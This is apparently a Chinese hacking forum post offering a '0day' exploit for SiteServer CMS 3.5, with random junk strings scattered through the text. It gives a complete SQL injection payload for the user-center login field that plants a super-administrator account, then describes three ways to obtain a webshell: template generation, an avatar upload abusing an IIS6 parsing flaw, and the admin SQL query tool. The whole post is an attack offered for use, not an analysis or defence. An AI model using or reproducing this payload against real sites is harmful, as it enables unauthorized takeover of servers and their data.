SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

stieserver官网:www.siteserver.cn
  {4 a. x9 v3 t9 L

9 x! s5 Y, l9 k' e
EXP:
$ [( v2 o- P6 N" B: k6 P
; `/ t7 A5 w1 H8 [! t直接访问UserCenter/login.aspx
3 L7 R6 l% I3 g# o) x/ [

* M: K1 A" U. v/ J
用户名处输入：
& G! |" ]0 n- ?9 K3 X0 _/ `( ^. G/ z
. ^! t" }  d0 k2 i123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ i4 c8 E3 B, s- d. j
5 X8 B8 |7 E5 U+ Q

# \0 W4 T) |1 o9 s( ~4 v6 Q密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
1 g% w  ]' `/ e" X4 [0 P/ T
( k) M. ^! J/ ^& A7 N2 J+ h" Z

/ I  K0 T5 V$ j7 K之后再访问后台SiteServer/login.aspx用插入的用户登陆

8 E6 _1 G# N/ E1 W" `
9 C! h: Z0 O" v# u) P9 A9 C
后台拿webshell的三种方法：
* z4 {% h: e, x% D6 s, |4 `
0 @6 ^" I( n  ^! J& @4 M- j一、
& N4 c" y3 ?! S& G/ R$ C/ m
; z3 a% e4 v2 m- b; J站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx

二、

成员权限-》添加用户-》用户名为：1.asp

http://127.0.0.1/usercenter/
2 F* R- V& \3 m( A- u8 F* e+ f
/ i# ?; n' ^. Z( Y% Y7 x% d" }用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
. i! E0 H* j& i& \+ @0 F+ j
8 S, ^& O, E: @（ps：后台添加用户时不会验证是否含有非法字符）

三、
' v1 E+ N' e) K+ q: L! o) O. V( o8 @
系统工具-》实用工具-》机器参数查看
3 n) H. G/ w$ i可以看到数据库类型、名称，WEB路径
- x6 u6 C" K4 j8 O' @
0 [4 T$ l2 K  a& Q系统工具-》数据库工具-》SQL语句查询
这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。
1 F: I+ ?: j1 [; t7 t# k- Q
; L) I3 T+ k9 }; w5 Q1 q' @% o